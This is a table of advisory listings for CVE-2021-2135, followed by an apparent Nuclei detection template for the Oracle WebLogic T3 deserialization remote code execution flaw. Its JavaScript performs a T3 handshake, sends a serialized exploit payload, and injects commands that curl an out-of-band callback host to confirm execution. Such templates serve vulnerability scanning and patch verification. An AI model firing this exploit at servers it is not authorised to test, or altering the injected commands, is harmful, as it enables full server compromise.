| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| The vulnerability of the Coherence Container component of the Oracle WebLogic Server application server allows attackers to compromise the confidentiality, integrity, and accessibility of protected information. | 19 May 2021 00:00 | – | bdu_fstec | |
| CVE-2021-2135 | 6 Dec 2025 04:16 | – | circl | |
| Oracle Fusion Middleware 安全漏洞 | 20 Apr 2021 00:00 | – | cnnvd | |
| Unspecified Vulnerability in Oracle WebLogic Server (CNVD-2021-30934) | 21 Apr 2021 00:00 | – | cnvd | |
| CVE-2021-2135 | 22 Apr 2021 21:53 | – | cve | |
| CVE-2021-2135 | 22 Apr 2021 21:53 | – | cvelist | |
| Vulnerabilities fixed in Oracle Fusion Middleware | 21 Apr 2021 00:00 | – | ncsc | |
| CVE-2021-2135 | 22 Apr 2021 22:15 | – | nvd | |
| Oracle Critical Patch Update Advisory - April 2021 | 20 Apr 2021 00:00 | – | oracle | |
| Oracle WebLogic Server Multiple Vulnerabilities (Apr 2021 CPU) | 22 Apr 2021 00:00 | – | nessus |
id: CVE-2021-2135
info:
name: Oracle WebLogic Server - Remote Code Execution
author: hnd3884
severity: critical
description: |
Oracle WebLogic Server (12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0) contains a remote code execution vulnerability. An unauthenticated attacker with network access via T3 or IIOP can exploit it to take over the server.
impact: |
Attackers can fully compromise the server, leading to data breach, service disruption, and potential further exploitation.
remediation: |
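Apply the Oracle Critical Patch Update of April 2021 (or a later CPU) to Oracle WebLogic Server. Until the patch is applied, restrict T3 and IIOP access to trusted networks, for example with a WebLogic connection filter.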
reference:
- https://www.oracle.com/security-alerts/cpuapr2021.html
- https://x-f1v3.github.io/blog/1626153074926.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-2135
epss-score: 0.0837
epss-percentile: 0.94288
cwe-id: CWE-502
cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: oracle
product: weblogic_server
shodan-query:
- cpe:"cpe:2.3:a:oracle:weblogic_server"
- product:"WebLogic"
- http.server:"WebLogic"
- port:7001
fofa-query: product="WebLogic" || header="WebLogic Server"
tags: cve,cve2021,weblogic,oracle,rce,vkev
javascript:
- pre-condition: |
// Gate for the check below: evaluates whether the TCP port named by the
// template arguments Host and Port accepts a connection.
isPortOpen(Host,Port);
code: |
// nuclei's network module; used by sendExploit to open the TCP connection.
const net = require('nuclei/net');

// Commands embedded in the two request variants. Each one only issues an
// outbound HTTP request to a per-platform hostname under the OAST domain,
// which is what the template's matchers later look for.
const CMD_LINUX = `curl http://rce-linux-host.${oast}`;
const CMD_WIN = `cmd.exe /c powershell curl http://rce-window-host.${oast}`;

// Target endpoint in host:port form, built from the template arguments.
const address = `${Host}:${Port}`;
/**
 * Encode an integer as a fixed-width byte array, most significant byte first.
 *
 * Only the low `byteLength` bytes are kept; higher bits are dropped.
 *
 * @param {number} num - Value to encode.
 * @param {number} [byteLength=2] - Width of the result in bytes.
 * @returns {Uint8Array} The encoded bytes.
 */
function decimalToFixedBytes(num, byteLength = 2) {
  const out = new Uint8Array(byteLength);
  let remaining = num;
  let pos = byteLength;
  // Fill from the last slot backwards so the lowest byte ends up at the end.
  while (pos-- > 0) {
    out[pos] = remaining & 0xff;
    remaining >>= 8;
  }
  return out;
}
/**
 * Recompute a two-byte hex field: parse `hexStr` as base 16, add the length
 * of the command string, subtract 19, and return the result as the hex of
 * two bytes (see decimalToFixedBytes).
 *
 * @param {string} hexStr - Original field value as hex digits.
 * @param {string} cmdLinux - Command string whose length is added; despite
 *   the name, callers pass the Windows command as well.
 * @returns {string} Hex encoding produced by the buffer's Hex().
 */
function buildLengthHex(hexStr, cmdLinux) {
  const adjusted = parseInt(hexStr, 16) + cmdLinux.length - 19;
  const out = bytes.Buffer();
  out.Write(decimalToFixedBytes(adjusted));
  return out.Hex();
}
/**
 * Variant of buildLengthHex that subtracts 90 instead of 19: parse `hexStr`
 * as base 16, add the length of the command string, subtract 90, and return
 * the result as the hex of two bytes (see decimalToFixedBytes).
 *
 * @param {string} hexStr - Original field value as hex digits.
 * @param {string} cmdLinux - Command string whose length is added; the only
 *   visible caller passes the Windows command.
 * @returns {string} Hex encoding produced by the buffer's Hex().
 */
function buildLengthHex2(hexStr, cmdLinux) {
  const adjusted = parseInt(hexStr, 16) + cmdLinux.length - 90;
  const out = bytes.Buffer();
  out.Write(decimalToFixedBytes(adjusted));
  return out.Hex();
}
/**
 * Hex-encode a string by writing it into a bytes buffer and reading the
 * buffer back as hex.
 *
 * @param {string} str - Text to encode.
 * @returns {string} Hex encoding produced by the buffer's Hex().
 */
function stringToHex(str) {
  const hexBuffer = bytes.Buffer();
  hexBuffer.WriteString(str);
  return hexBuffer.Hex();
}
/**
 * Opens a TCP connection to `address`, sends the T3 handshake header, reads
 * the server's reply, then sends `payload` as a second hex-encoded message.
 * Nothing is returned and the reply is not inspected; the outcome is judged
 * from out-of-band interactions, not from this connection.
 *
 * Defensive note: the handshake below is plaintext, so it is the first thing
 * a network sensor or connection filter sees from a T3 client.
 *
 * @param {string} payload - Hex string sent after the handshake.
 */
function sendExploit(payload) {
// NOTE(review): s1 is assigned without a declaration (implicit global), and
// the connection is not closed anywhere in this function.
s1 = net.Open('tcp', address);
// Hex of "t3 7.0.0.0\nAS:10\nHL:19\n\n".
s1.SendHex("743320372e302e302e300a41533a31300a484c3a31390a0a");
// Read the reply to the handshake; the data is discarded.
s1.Recv(4096);
s1.SendHex(payload);
}
// Hex template for the message sent after the T3 handshake; the replace()
// calls below look up fixed hex substrings in it.
// NOTE(review): sample, payload_linux and payload_win are assigned without
// const/let, so they become implicit globals.
sample = "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";
// Derive one request per platform. 636d642e657865202f632063616c632e657865 is
// the hex of "cmd.exe /c calc.exe"; it is swapped for the hex of the callback
// command, and the listed two-byte hex fields are recomputed from the new
// command's length via buildLengthHex / buildLengthHex2.
// replace() with a string pattern changes only the first occurrence, and each
// call works on the previous call's output, so the order of the chain matters.
payload_linux = sample.replace("636d642e657865202f632063616c632e657865", stringToHex(CMD_LINUX)).replace('0486', buildLengthHex('0486', CMD_LINUX)).replace('016f', buildLengthHex('016f', CMD_LINUX)).replace('00d3', buildLengthHex('00d3', CMD_LINUX)).replace('0091', buildLengthHex('0091', CMD_LINUX));
payload_win = sample.replace("636d642e657865202f632063616c632e657865", stringToHex(CMD_WIN)).replace('0486', buildLengthHex('0486', CMD_WIN)).replace('016f', buildLengthHex('016f', CMD_WIN)).replace('00d3', buildLengthHex('00d3', CMD_WIN)).replace('009101', buildLengthHex2('0098', CMD_WIN) + '02');
// Send both variants, each on its own connection. Detection is out-of-band:
// the template's matchers require a DNS interaction whose request contains
// rce-linux or rce-window. A target that cannot resolve external names
// produces no callback, so a missing match does not show the host is patched.
sendExploit(payload_linux)
sendExploit(payload_win)
args:
Host: "{{Host}}"
Port: "7001"
oast: "{{interactsh-url}}"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- type: word
part: interactsh_request
words:
- "rce-linux"
- "rce-window"
condition: or
extractors:
- type: regex
part: interactsh_request
regex:
- 'rce-(linux|window)[^\s]*'
# digest: 4a0a00473045022100fdb090e912d14163c6acb368ceb5c07ed2947d2048d92b9080a047ab45f0161f02206b5931d4e02f4a9fb42a83776266bc2bccfbc252ff46dd935c8ef5a2b5620851:922c64590222798bb761d5b6d8e72950